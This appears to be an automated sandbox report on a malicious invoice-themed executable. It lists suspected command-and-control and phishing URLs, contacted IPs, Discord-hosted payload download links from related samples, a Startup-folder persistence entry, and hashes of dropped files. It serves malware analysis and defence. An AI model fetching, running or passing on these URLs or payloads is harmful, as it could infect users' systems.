                                          http://www.transformertabletable.comwww.transformertabletable.comexplorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.chernenko.xyz/c4mw/explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.nonport.livewww.nonport.liveexplorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.transformertabletable.comexplorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=2SD0--712.8.drfalse
                                            		high
                                            https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchipconfig.exe, 00000008.00000002.582221249.00000000031CC000.00000004.00000020.00020000.00000000.sdmp, 2SD0--712.8.drfalse
                                              		high
                                              http://www.johnnsprague.comwww.johnnsprague.comexplorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://cdn.discordapp.comPayment INV NO. 230203-1USD.exe, 00000000.00000002.333839662.0000000002681000.00000004.00000800.00020000.00000000.sdmp, Payment INV NO. 230203-1USD.exe, 00000006.00000002.379618522.0000000002D81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.2463.org/c4mw/explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://www.chernenko.xyzexplorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.edgeonetest-14.top/c4mw/explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=ipconfig.exe, 00000008.00000002.582221249.00000000031CC000.00000004.00000020.00020000.00000000.sdmp, 2SD0--712.8.drfalse
                                                  		high
                                                  https://ac.ecosia.org/autocomplete?q=2SD0--712.8.drfalse
                                                    		high
                                                    https://search.yahoo.com?fr=crmas_sfpipconfig.exe, 00000008.00000002.582221249.00000000031CC000.00000004.00000020.00020000.00000000.sdmp, 2SD0--712.8.drfalse
                                                      		high
                                                      http://www.johnnsprague.com/c4mw/explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.genuineinsights.cloudexplorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: phishing
                                                      		unknown
                                                      http://www.fantastica.org.uk/c4mw/explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.cmproutdoors.comwww.cmproutdoors.comexplorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.fantastica.org.ukexplorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.cmproutdoors.com/c4mw/=Mexplorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.idszua.com/c4mw/explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.dylnov.ruexplorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.justicepeacefamily.comexplorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.toporsche.online/c4mw/Hexplorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.genuineinsights.cloudwww.genuineinsights.cloudexplorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: phishing
                                                      		unknown
                                                      http://www.nonport.live/c4mw/7explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.toporsche.onlinewww.toporsche.onlineexplorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=2SD0--712.8.drfalse
                                                        		high
                                                        http://www.chernenko.xyzwww.chernenko.xyzexplorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.cmproutdoors.com/c4mw/explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.dylnov.ru/c4mw/explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        		unknown

                                                        World Map of Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public IPs

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        20.216.185.237
                                                        		chernenko.xyzUnited States
                                                        		8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue
                                                        162.159.129.233
                                                        		unknownUnited States
                                                        		13335CLOUDFLARENETUSfalse
                                                        194.102.227.30
                                                        		cutgang.netRomania
                                                        		12302VODAFONE_ROCharlesdeGaullenr15ROtrue
                                                        83.229.19.64
                                                        		lokoua.comUnited Kingdom
                                                        		8513SKYVISIONGBtrue
                                                        162.159.135.233
                                                        		cdn.discordapp.comUnited States
                                                        		13335CLOUDFLARENETUSfalse

                                                        General Information

                                                        Joe Sandbox Version:36.0.0 Rainbow Opal
                                                        Analysis ID:813147
                                                        Start date and time:2023-02-22 08:35:12 +01:00
                                                        Joe Sandbox Product:CloudBasic
                                                        Overall analysis duration:0h 10m 54s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                        Number of analysed new started processes analysed:13
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:1
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • HDC enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample file name:Payment INV NO. 230203-1USD.exe
                                                        Detection:MAL
                                                        Classification:mal100.troj.adwa.spyw.evad.winEXE@22/4@9/5
                                                        EGA Information:
                                                        • Successful, ratio: 100%
                                                        HDC Information:
                                                        • Successful, ratio: 96.8% (good quality ratio 85.4%)
                                                        • Quality average: 74.8%
                                                        • Quality standard deviation: 32.2%
                                                        HCA Information:
                                                        • Successful, ratio: 85%
                                                        • Number of executed functions: 47
                                                        • Number of non-executed functions: 150
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe

                                                        Warnings

                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe
                                                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, ctldl.windowsupdate.com
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                                        Simulations

                                                        Behavior and APIs

                                                        TimeTypeDescription
                                                        08:36:20API Interceptor4x Sleep call for process: Payment INV NO. 230203-1USD.exe modified
                                                        08:36:25AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exe
                                                        08:36:26API Interceptor648x Sleep call for process: explorer.exe modified

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        20.216.185.237dutch_94854_0293_invoice_30495.exeGet hashmaliciousFormBookBrowse
                                                        • www.chernenko.xyz/4pbr/?ja04=5wGwRTFqOJyk&ftVIcRD=9LEm0FdjyrCPn+d+eIPfzNpxGlE5TIRImqdhnpITGW+0xco0H8wRWWqwGjNDs/gxM/i2kx/134T+J2ntclJtFSj151lYQ1/qaw==
                                                        162.159.129.233SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                        • cdn.discordapp.com/attachments/956928735397965906/1004544301541363733/bantylogger_dhBqf163.bin
                                                        64AE5410F978DF0F48DCC67508820EA230C566967E002.exeGet hashmaliciousDCRatBrowse
                                                        • cdn.discordapp.com/attachments/932607293869146142/941782821578633216/Sjxupcet.jpg
                                                        http://162.159.129.233Get hashmaliciousUnknownBrowse
                                                        • 162.159.129.233/favicon.ico
                                                        2lfV6QiE6j.exeGet hashmaliciousUnknownBrowse
                                                        • cdn.discordapp.com/attachments/937614907917078588/937618926945329213/macwx.log
                                                        SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeGet hashmaliciousAmadeyBrowse
                                                        • cdn.discordapp.com/attachments/878034206570209333/908810886561534042/slhost.exe
                                                        1PhgF7ujwW.exeGet hashmaliciousAmadeyBrowse
                                                        • cdn.discordapp.com/attachments/878382243242983437/879280740578263060/FastingTabbied_2021-08-23_11-26.exe
                                                        vhNyVU8USk.exeGet hashmaliciousAmadeyBrowse
                                                        • cdn.discordapp.com/attachments/837741922641903637/866064264027701248/svchost.exe
                                                        Order 4503860408.exeGet hashmaliciousAgentTeslaBrowse
                                                        • cdn.discordapp.com/attachments/809311531652087809/839376179840286770/originbot4.0.exe
                                                        cotizacin.docGet hashmaliciousUnknownBrowse
                                                        • cdn.discordapp.com/attachments/812102734177763331/819187064415191071/bextrit.exe
                                                        SecuriteInfo.com.PWS-FCXDF96A01717A58.15363.exeGet hashmaliciousRemcosBrowse
                                                        • cdn.discordapp.com/attachments/819169403979038784/819184830453514270/fraem.exe
                                                        7G5RoevPnu.exeGet hashmaliciousAmadey Ficker StealerBrowse
                                                        • cdn.discordapp.com/attachments/807746340997431316/809208342068199434/118fir2crtg.exe
                                                        70% Balance Payment.docGet hashmaliciousUnknownBrowse
                                                        • cdn.discordapp.com/attachments/785631384156110868/785631871395561492/italianmassloga.exe
                                                        TT20201712.docGet hashmaliciousUnknownBrowse
                                                        • cdn.discordapp.com/attachments/788973775433498687/788974151649722398/damianox.scr
                                                        ENQ-015August 2020 R1 Proj LOT.docGet hashmaliciousFormBookBrowse
                                                        • cdn.discordapp.com/attachments/722888184203051118/757862128198877274/Stub.jpg

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        td-ccm-168-233.wixdns.netPfizer Request for Quotation P1072023.comGet hashmaliciousFormBook, GuLoaderBrowse
                                                        • 34.117.168.233
                                                        WSNMBRTSK002023.com.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                        • 34.117.168.233
                                                        OR_HO1163_SKF_AH23.exeGet hashmaliciousFormBookBrowse
                                                        • 34.117.168.233
                                                        file.exeGet hashmaliciousFormBookBrowse
                                                        • 34.117.168.233
                                                        sales contract-876 & New-Order.exeGet hashmaliciousFormBookBrowse
                                                        • 34.117.168.233
                                                        Pepsico LLC RFQ Information.com.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                        • 34.117.168.233
                                                        dutch_94854_0293_invoice_30495.exeGet hashmaliciousFormBookBrowse
                                                        • 34.117.168.233
                                                        20022023_06.exeGet hashmaliciousFormBookBrowse
                                                        • 34.117.168.233
                                                        SALARY RECEIPT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                        • 34.117.168.233
                                                        QN16S70318.exeGet hashmaliciousFormBookBrowse
                                                        • 34.117.168.233
                                                        file.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
                                                        • 34.117.168.233
                                                        file.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
                                                        • 34.117.168.233
                                                        file.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
                                                        • 34.117.168.233
                                                        GyTbKONlyq.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
                                                        • 34.117.168.233
                                                        ZiraatEkstre_20230215.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                        • 34.117.168.233
                                                        Specification.jsGet hashmaliciousFormBookBrowse
                                                        • 34.117.168.233
                                                        Zahlungsbestatigung.exeGet hashmaliciousFormBookBrowse
                                                        • 34.117.168.233
                                                        DETAILS AND INVOICES.exeGet hashmaliciousFormBookBrowse
                                                        • 34.117.168.233
                                                        RFQ.exeGet hashmaliciousFormBookBrowse
                                                        • 34.117.168.233
                                                        Lv8QWUVq3P.exeGet hashmaliciousFormBookBrowse
                                                        • 34.117.168.233

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        MICROSOFT-CORP-MSN-AS-BLOCKUShttp://jcihbkph.sarkli.com/?em=max.mustermann@example.comGet hashmaliciousHTMLPhisherBrowse
                                                        • 20.44.10.123
                                                        https://n3m6x.app.goo.gl/eCJuiZi9ujHye41d7Get hashmaliciousUnknownBrowse
                                                        • 20.48.252.155
                                                        https://sigtn.com/utils/emt.cfm?client_id=4768014&campaign_id=888888&qid=30692089&link=aHR0cHM6Ly85MmoyNDMuY29kZXNhbmRib3guaW8vP3JzPWEyRnlaVzR1Y0c5c2EybHVaMmh2Y201bFFHNWxkSGR2Y210d1lYSjBibVZ5Y3k1amIyMD0=Get hashmaliciousUnknownBrowse
                                                        • 13.107.43.14
                                                        https://www.bing.com/ck/a?!&&p=6f06ea36b7b841b3JmltdHM9MTY3NjkzNzYwMCZpZ3VpZD0wNmYzMzZjNS01Y2Q5LTY1N2ItMGY3My0yNDdhNWQ0YjY0OGMmaW5zaWQ9NTE2MQ&ptn=3&hsh=3&fclid=06f336c5-5cd9-657b-0f73-247a5d4b648c&u=a1aHR0cHM6Ly9zb3V0aHNpbWNvZWJobC5jb20v#c3VzYW4uY2FtcGJlbGxAc2luYWkub3JnGet hashmaliciousHTMLPhisherBrowse
                                                        • 13.107.237.60
                                                        Kara Duven shared Comm with you. (26.6 KB).msgGet hashmaliciousHTMLPhisherBrowse
                                                        • 13.107.229.28
                                                        https://westernequitypartners-my.sharepoint.com/:f:/g/personal/sarah_akelapest_com/Ehamj_RGXzxMpinv9tBN1AoBSp2aYdJsbftoRFQjwlyipQ?e=ZFoq0bGet hashmaliciousHTMLPhisherBrowse
                                                        • 40.99.150.82
                                                        https://survey123.arcgis.com/share/876caaaca3df43979b254e29f95c2a3bGet hashmaliciousHTMLPhisherBrowse
                                                        • 13.107.237.60
                                                        https://affiliate.insider.com/?amazonTrackingID=biauto-1053-20&postID=61b8efc8f2a36b1ac9f42d54&site=in&u=http://Motional.houseoflegendsusa.com/Motional/zeb.dawson@motional.comGet hashmaliciousHTMLPhisherBrowse
                                                        • 13.107.237.60
                                                        http://ss1.us/a/4Y56S54fGet hashmaliciousHTMLPhisherBrowse
                                                        • 13.107.43.14
                                                        Xerox Scan_2152023-254815323232.PDF.htmGet hashmaliciousHTMLPhisherBrowse
                                                        • 13.107.238.45
                                                        http://ss1.us/a/4Y56S54fGet hashmaliciousHTMLPhisherBrowse
                                                        • 13.107.42.14
                                                        scan_arm4.elfGet hashmaliciousUnknownBrowse
                                                        • 22.183.202.89
                                                        https://1drv.ms/u/s!AssllS5g4GUTi-YTp9f-5UdmVu970w?e=NedQZkGet hashmaliciousHTMLPhisherBrowse
                                                        • 52.111.243.14
                                                        https://1drv.ms/u/s!AiCbZhUZGr29ngSvQJZjxGNDFkid?e=O1cen8Get hashmaliciousUnknownBrowse
                                                        • 13.107.42.12
                                                        https://go.redirectingat.com/?id=803X112721&xcust=06-3696717-11-0000000&sref=https%3A%2F%2Fwww.techadvisor.co.uk%2Fnew-product%2Fmobile-phone%2Foneplus-7-3696717%2F&xs=1&url=https%3A%2F%2F60bfj8.codesandbox.io?trek=cGF3YW4uZ3VwdGFAYmx1ZXlvbmRlci5jb20=Get hashmaliciousUnknownBrowse
                                                        • 13.107.43.14
                                                        inst_client.exeGet hashmaliciousUnknownBrowse
                                                        • 52.109.88.191
                                                        philip.chambers.Audiomsg4847.htmlGet hashmaliciousHTMLPhisherBrowse
                                                        • 13.107.253.60
                                                        parcel information_pdf.exeGet hashmaliciousUnknownBrowse
                                                        • 13.107.43.13
                                                        02-21-2023eSUMMARY.htmGet hashmaliciousHTMLPhisherBrowse
                                                        • 13.107.237.60
                                                        https://sphereqc-my.sharepoint.com/:o:/g/personal/f_massin_sphere-qc_ca/Emr4Uz8Up7tGqta9Nm6kALcB-HzDfa87yFqZkWDzGbi7eA?e=5%3aDWInQo&at=9Get hashmaliciousHTMLPhisherBrowse
                                                        • 52.111.224.12

                                                        JA3 Fingerprints

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        3b5074b1b5d032e5620f69f9f700ff0eELC205500207022 - 22INSC000509128.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 162.159.135.233
                                                        • 162.159.129.233
                                                        bg19xlsTpz.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 162.159.135.233
                                                        • 162.159.129.233
                                                        DOC.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 162.159.135.233
                                                        • 162.159.129.233
                                                        Doosan.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 162.159.135.233
                                                        • 162.159.129.233
                                                        g5v8gvdf2G.exeGet hashmaliciousAgentTesla, SmokeLoaderBrowse
                                                        • 162.159.135.233
                                                        • 162.159.129.233
                                                        REQUEST_FOR_QUOTATIONS_SAMPLEP#83785ABP_PRODUCTIONSP.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 162.159.135.233
                                                        • 162.159.129.233
                                                        PI 160256.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 162.159.135.233
                                                        • 162.159.129.233
                                                        wPTjftRzhmf9lzN.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                        • 162.159.135.233
                                                        • 162.159.129.233
                                                        Bank Details.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 162.159.135.233
                                                        • 162.159.129.233
                                                        Shipment Invoice.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 162.159.135.233
                                                        • 162.159.129.233
                                                        host.dllGet hashmaliciousIcedIDBrowse
                                                        • 162.159.135.233
                                                        • 162.159.129.233
                                                        payment.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 162.159.135.233
                                                        • 162.159.129.233
                                                        PI.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 162.159.135.233
                                                        • 162.159.129.233
                                                        https://107.23.15.11Get hashmaliciousUnknownBrowse
                                                        • 162.159.135.233
                                                        • 162.159.129.233
                                                        RFQ.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 162.159.135.233
                                                        • 162.159.129.233
                                                        https://adobes-team.adalo.com/adobeGet hashmaliciousHTMLPhisherBrowse
                                                        • 162.159.135.233
                                                        • 162.159.129.233
                                                        TSL Company RFQ PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 162.159.135.233
                                                        • 162.159.129.233
                                                        PRE ALERT NOTICE.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 162.159.135.233
                                                        • 162.159.129.233
                                                        TT Telex Balance Payment Copy 230223 PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 162.159.135.233
                                                        • 162.159.129.233
                                                        transferencia.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 162.159.135.233
                                                        • 162.159.129.233

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Payment INV NO. 230203-1USD.exe.log

                                                        Download File
                                                        Process:C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1220
                                                        Entropy (8bit):5.354495486938689
                                                        Encrypted:false
                                                        SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7K84FsXE4j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzH
                                                        MD5:84AFF34F78964B002FC69A3CA831C066
                                                        SHA1:8D471ED6AFDA73E36614C489C1064625528CC150
                                                        SHA-256:CA6FC8726CE38B46DEBC99C6C40BFED0F3ACAE5304B0E21C51E697055CCCDCB1
                                                        SHA-512:A9A859C5CB99D8FA308D48EC983D8CCBEDD4E085A084C33A2FD644AD4D923E08CCA4CEF149648219130351A067ECA065DEC02469D01A9DF3FA5410AF7884945F
                                                        Malicious:true
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                        C:\Users\user\AppData\Local\Temp\2SD0--712

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\ipconfig.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                        Category:dropped
                                                        Size (bytes):94208
                                                        Entropy (8bit):1.287139506398081
                                                        Encrypted:false
                                                        SSDEEP:192:Qo1/8dpUXbSzTPJPF6n/YVuzdqfEwn7PrH944:QS/indc/YVuzdqfEwn7b944
                                                        MD5:292F98D765C8712910776C89ADDE2311
                                                        SHA1:E9F4CCB4577B3E6857C6116C9CBA0F3EC63878C5
                                                        SHA-256:9C63F8321526F04D4CD0CFE11EA32576D1502272FE8333536B9DEE2C3B49825E
                                                        SHA-512:205764B34543D8B53118B3AEA88C550B2273E6EBC880AAD5A106F8DB11D520EB8FD6EFD3DB3B87A4500D287187832FCF18F60556072DD7F5CC947BB7A4E3C3C1
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exe

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):37376
                                                        Entropy (8bit):5.274094209839526
                                                        Encrypted:false
                                                        SSDEEP:768:h7XXrCDgJRjD8LfDYfNpPLGnpc1gK2O7o8S6PnBBiScJ:9nAsjDkfDYfNpipc1gdO7o8QScJ
                                                        MD5:D6460E1A62BFB5366FFF5959B99BBEDE
